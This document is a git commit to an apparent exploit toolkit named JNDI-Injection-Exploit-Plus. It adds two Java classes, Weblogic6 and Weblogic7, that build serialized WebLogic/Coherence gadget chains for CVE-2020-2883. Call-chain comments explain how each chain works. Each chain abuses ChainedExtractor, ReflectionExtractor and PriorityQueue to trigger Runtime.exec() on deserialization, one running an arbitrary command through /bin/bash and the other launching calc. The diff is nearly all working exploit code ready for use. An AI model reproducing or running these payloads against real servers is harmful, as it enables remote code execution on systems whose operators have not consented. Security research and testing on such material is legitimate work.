add CVE-2020-2883

cckuailong · cckuailong · commit fd035e554543 · 2023-02-23T10:18:46.000+08:00
diff --git a/pom.xml b/pom.xml
@@ -6,7 +6,7 @@
 
     <groupId>cckuailong</groupId>
     <artifactId>JNDI-Injection-Exploit-Plus</artifactId>
-    <version>1.9-SNAPSHOT</version>
+    <version>2.0-SNAPSHOT</version>
 
     <properties>
         <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
diff --git a/src/main/java/payloads/Weblogic6.java b/src/main/java/payloads/Weblogic6.java
@@ -0,0 +1,83 @@
+package payloads;
+
+import com.tangosol.util.ValueExtractor;
+import com.tangosol.util.comparator.ExtractorComparator;
+import com.tangosol.util.extractor.ChainedExtractor;
+import com.tangosol.util.extractor.ReflectionExtractor;
+import common.Serializer;
+import payloads.annotation.Authors;
+import payloads.annotation.Dependencies;
+import util.PayloadRunner;
+import util.Reflections;
+
+import java.lang.reflect.Field;
+import java.util.PriorityQueue;
+
+
+/*
+
+ObjectInputStream.readObject()
+    PriorityQueue.readObject()
+        PriorityQueue.heapify()
+            PriorityQueue.siftDown()
+                siftDownUsingComparator()
+                    com.tangosol.util.comparator.ExtractorComparator.compare()
+                        com.tangosol.util.extractor.ChainedExtractor.extract()
+                            com.tangosol.util.extractor.ReflectionExtractor().extract()
+                                Method.invoke()
+                                .......
+                            com.tangosol.util.extractor.ReflectionExtractor().extract()
+                                Method.invoke()
+                                Runtime.exec()
+ */
+
+// CVE-2020-2883 1
+
+@SuppressWarnings({ "rawtypes", "unchecked" })
+@Dependencies({"weblogic:10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4"})
+@Authors({ Authors.FROHOFF })
+public class Weblogic6 implements ObjectPayload<Object> {
+
+	public byte[] getObject(final String command) throws Exception {
+		ReflectionExtractor reflectionExtractor1 = new ReflectionExtractor("getMethod", new Object[]{"getRuntime", new Class[]{}});
+		ReflectionExtractor reflectionExtractor2 = new ReflectionExtractor("invoke", new Object[]{null, new Object[]{}});        //ReflectionExtractor reflectionExtractor3 = new ReflectionExtractor("exec", new Object[]{new String[]{"calc"}});
+		ReflectionExtractor reflectionExtractor3 = new ReflectionExtractor("exec", new Object[]{new String[]{"/bin/bash", "-c", command}});
+
+		ValueExtractor[] valueExtractors = new ValueExtractor[]{
+				reflectionExtractor1,
+				reflectionExtractor2,
+				reflectionExtractor3,
+		};
+
+		Class clazz = ChainedExtractor.class.getSuperclass();
+		Field m_aExtractor = clazz.getDeclaredField("m_aExtractor");
+		m_aExtractor.setAccessible(true);
+
+		ReflectionExtractor reflectionExtractor = new ReflectionExtractor("toString", new Object[]{});
+		ValueExtractor[] valueExtractors1 = new ValueExtractor[]{
+				reflectionExtractor
+		};
+
+		ChainedExtractor chainedExtractor1 = new ChainedExtractor(valueExtractors1);
+
+		PriorityQueue queue = new PriorityQueue(2, new ExtractorComparator(chainedExtractor1));
+		queue.add("1");
+		queue.add("1");
+		m_aExtractor.set(chainedExtractor1, valueExtractors);
+
+		Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
+		queueArray[0] = Runtime.class;
+		queueArray[1] = "1";
+
+		return Serializer.serialize(queue);
+	}
+
+	public static byte[] getBytes(final String command) throws Exception {
+		return Weblogic6.class.newInstance().getObject(command);
+	}
+
+	public static void main(final String command) throws Exception {
+		PayloadRunner.run(Weblogic6.class, command);
+	}
+
+}
diff --git a/src/main/java/payloads/Weblogic7.java b/src/main/java/payloads/Weblogic7.java
@@ -0,0 +1,76 @@
+package payloads;
+
+import com.tangosol.coherence.reporter.extractor.ConstantExtractor;
+import com.tangosol.util.ValueExtractor;
+import com.tangosol.util.extractor.ChainedExtractor;
+import com.tangosol.util.extractor.MultiExtractor;
+import com.tangosol.util.extractor.ReflectionExtractor;
+import common.Serializer;
+import payloads.annotation.Authors;
+import payloads.annotation.Dependencies;
+import util.PayloadRunner;
+
+import java.lang.reflect.Field;
+import java.util.PriorityQueue;
+
+
+/*
+
+ObjectInputStream.readObject()
+    PriorityQueue.readObject()
+        PriorityQueue.heapify()
+            PriorityQueue.siftDown()
+                siftDownUsingComparator()
+                    com.tangosol.util.extractor.AbstractExtractor.compare()
+                      com.tangosol.util.extractor.MultiExtractor.extract()
+                        com.tangosol.util.extractor.ChainedExtractor.extract()
+                            com.tangosol.util.extractor.ChainedExtractor.extract()
+                                com.tangosol.util.extractor.ReflectionExtractor().extract()
+                                    Method.invoke()
+                                    .......
+                                com.tangosol.util.extractor.ReflectionExtractor().extract()
+                                    Method.invoke()
+                                    Runtime.exec()
+ */
+
+// CVE-2020-2883 2
+
+@SuppressWarnings({ "rawtypes", "unchecked" })
+@Dependencies({"weblogic:10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4"})
+@Authors({ Authors.FROHOFF })
+public class Weblogic7 implements ObjectPayload<Object> {
+
+	public byte[] getObject(final String command) throws Exception {
+		ValueExtractor[] valueExtractors = new ValueExtractor[]{
+				new ConstantExtractor(Runtime.class),
+				new ReflectionExtractor("getMethod", new Object[]{"getRuntime", new Class[0]}),
+				new ReflectionExtractor("invoke", new Object[]{null, new Object[0]}),
+				new ReflectionExtractor("exec", new Object[]{new String[]{"cmd.exe", "/c", "calc"}})
+		};
+		ChainedExtractor chainedExtractor = new ChainedExtractor<>(valueExtractors);
+		MultiExtractor multiExtractor = new MultiExtractor();
+
+		Field m_extractor = multiExtractor.getClass().getSuperclass().getDeclaredField("m_aExtractor");
+		m_extractor.setAccessible(true);
+		m_extractor.set(multiExtractor, new ValueExtractor[]{chainedExtractor});
+
+		PriorityQueue priorityQueue = new PriorityQueue();
+		priorityQueue.add("foo");
+		priorityQueue.add("bar");
+
+		Field comparator = priorityQueue.getClass().getDeclaredField("comparator");
+		comparator.setAccessible(true);
+		comparator.set(priorityQueue, multiExtractor);
+
+		return Serializer.serialize(priorityQueue);
+	}
+
+	public static byte[] getBytes(final String command) throws Exception {
+		return Weblogic7.class.newInstance().getObject(command);
+	}
+
+	public static void main(final String command) throws Exception {
+		PayloadRunner.run(Weblogic7.class, command);
+	}
+
+}
